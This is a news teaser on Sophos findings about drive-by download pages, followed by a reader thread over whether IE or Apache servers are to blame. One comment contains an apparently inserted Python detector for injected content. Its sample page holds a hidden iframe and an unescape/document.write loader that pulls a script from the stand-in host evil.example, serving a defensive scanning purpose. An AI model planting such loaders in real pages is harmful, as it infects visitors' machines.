Drive-by download menace spreading fast

Booby-trapped web pages are growing at an alarming rate, with unsuspecting firms acting as nurseries for botnet farmers, according to a new study. Security watchers at Sophos are discovering 6,000 new infected webpages every day, the equivalent of one every 14 seconds. Four in five (83 per cent) of these webpages actually …

COMMENTS

This topic is closed for new posts.
  1. Dave Bell
    Coat

    Internet Explorer? Again?

    With the politicians trying to criminalise "hacking tools", should Internet Explorer still be legal?

  2. Anonymous Coward
    Anonymous Coward

    Ahhh, you got the 2008 Security Report then?

    Interesting read, innit?

    :-)

  3. jrb
    Thumb Down

    too quick to blame IE?

    I think you're missing the point here if you're going to jump on the bandwagon and try to blame Internet Explorer.

    How are these zombie sites getting infected? Sophos' research suggests a combination of JavaScript and a web server exploit. Apache was named as a webserver that's been exploitable, although it seems it's not limited to just that.

    http://www.cpanel.net/security/notes/random_js_toolkit.html

  4. b shubin
    Pirate

    Target vuln

    @ jrb

    If your client doesn't have the IE iFrame vulnerability, or is not vulnerable to a JS exploit, or some ActiveX bug (there's one every couple of months, seems like), it matters not what the server is doing. If the client is not exploitable, it can't be exploited.

    How is this not obvious?

    Bandwagon has nothing to do with it.

    Why is it that someone always jumps up to defend IE? It's a commercial product; they have paid marketing drones to handle PR. More importantly, who benefits from such spirited (if not always coherent) defense? And if the party that benefits is Microsoft, one has to wonder whether at least some of the defenders are astroturfing.

  5. JC

    @ jrb

    No point missed jrb, it doesn't matter at all how the zombie sites are getting infected, NOT THE TINIEST LITTLE BIT when it comes to resolving the effect on the masses pseudo-innocently surfing the web.

    No matter what, a properly secured browser will not infect the host accessing a webserver. At worst, a fault in the server side will just prevent the website from operating properly, which we can say is a fault in its security, but the drive-by download menace is only a menace when the host browser allows it.

    Remember, when surfing the web you run software that downloads code. The code could be anything at all, and the software you are running has to deal with it. No amount of trying to prevent random code from flowing could ever work, it has to be the client side that limits what could happen.

  6. B Gracey

    Browser doesn't matter if...

    You're not smart enough to protect yourself.

    Saying that the problem lies with web servers and that the solution starts there is like saying there's a problem with theft in high density urban areas and the police should do more to protect the people at large.

    Just like you ought to lock your vehicle up to help protect yourself, you also ought to learn about how to block iFrames, VBScript, ActiveX and JavaScript - only allowing those things on a per-page or per-site basis as needed to get through your task.

    If you're just surfing, why would you want your browser wide open to all those attack vectors?

  7. Pascal Monett Silver badge

    Won't affect me

    As owner of a web site, I am glad to see that my complete lack of Java, ActiveX modules and Apache anything in my site code preserves the security of all users who get to my pages - even if they are sufficiently misled to use a prime malware vector such as IE (any flavor).

    Heck, I don't even set cookies on my site! It's pure HTML, all the way.

    Of course, I don't attempt to sell anything either, so it's easier to be clean.

    As for my own security, I am confident that my browser will not foist a download upon me without a warning, and that I can actually make an intelligent evaluation before clicking on something.

  8. Anonymous Coward
    Thumb Down

    @Pascal

    You don't put "Apache anything" in your site code (or 'markup' as it's known if it's "pure HTML"), but then most people don't, because Apache is a webserver and not a content enhancing browser extension like Java or ActiveX.

    Chances are that your website is hosted and served by an Apache webserver; it's by far the most common web server out there.

    If the web server that hosts your site is compromised there is little you can do to prevent your site being used to distribute malware even if you know what you are doing and especially if that server is owned and managed by someone else.

    Unless I missed the point somewhere then based on your post I wouldn't be too confident about being safe from malware if I were you.

  9. Graham Cluley
    Alert

    Apache web servers hosting malware

    Yes, Sophos's research found that 48.7% of the compromised websites were running Apache. The next closest was IIS 6 which was used on 40.6% of the websites hosting malicious code. There is a danger that people may think that just by avoiding Microsoft software they're immune from attack - which is clearly nonsense.

    Most of these webpages are poisoned with malicious iframes and obfuscated JavaScript pointing to Trojan horses capable of infecting Windows users. Sophos also saw some financially-motivated Mac malware being distributed via the web in the last few months too.

    The full report is available from http://www.sophos.com/securityreport2008 if anyone is interested. You have to fill in a form to get at the PDF with the meat of the report, but you can always say you're Donald Duck if you're paranoid we're going to do something ghastly with your details...

    Graham Cluley, Senior technology consultant, Sophos
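    As an added example (not from this thread or from Sophos), a small Python heuristic a site owner could run over their own served pages to spot the two injection patterns Graham describes above: iframes made invisible and script blocks that decode escaped payloads at run time. The sample pages and the evil.example / video.example hosts are constructed for the example.

```python
import re
from html.parser import HTMLParser
# Heuristics for the injected content described above: iframes made invisible
# (zero-size or hidden via CSS) and scripts that decode escaped payloads at run time.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
OBFUSCATION = re.compile(r"\beval\s*\(|\bunescape\s*\(|String\.fromCharCode\s*\("
                         r"|(?:%[0-9a-f]{2}){20,}|(?:\\x[0-9a-f]{2}){20,}", re.I)

class InjectScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []      # list of (finding, detail) tuples
        self._script = None     # buffer for the current <script> body

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
            if tiny or HIDDEN_STYLE.search(a.get("style", "")):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script).strip()
            if OBFUSCATION.search(body):
                self.findings.append(("obfuscated-script", body[:40]))
            self._script = None

def scan_html(html):
    """Return suspicious findings for one HTML document (empty list if clean)."""
    p = InjectScanner()
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample pages; evil.example / video.example are placeholder hosts.
INJECTED = """<html><body><h1>Welcome</h1>
<iframe src="http://evil.example/in.php" width="0" height="0" style="display:none"></iframe>
<script>var s='%3Cscript%20src%3D%22http%3A%2F%2Fevil.example%2Fx.js%22%3E%3C%2Fscript%3E';
document.write(unescape(s));</script><script src="/js/site.js"></script></body></html>"""
CLEAN = """<html><body><p>Plain page</p>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<script>document.getElementById('x').innerHTML = 'hi';</script></body></html>"""
```

    Running scan_html over a crawl of your own site (or a diff of it against a known-good copy) turns up injected content regardless of which web server or client browser is involved.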

  10. b shubin
    Boffin

    How goofy would that be?

    @ Graham Cluley

    What if one actually IS Donald Duck (and paranoid)? Perception is reality, you know...

    Any idea yet what the vector is? Would having a squid proxy on, say, OpenBSD, in front of your Apache box help? What if it's configured with an ACL? SELinux? Whitelist only? What if your site is strictly flat HTML, are you immune? Is the Pope Catholic? ...just checking if you're paying attention.

    Thanks for reading, and any answers you can provide.
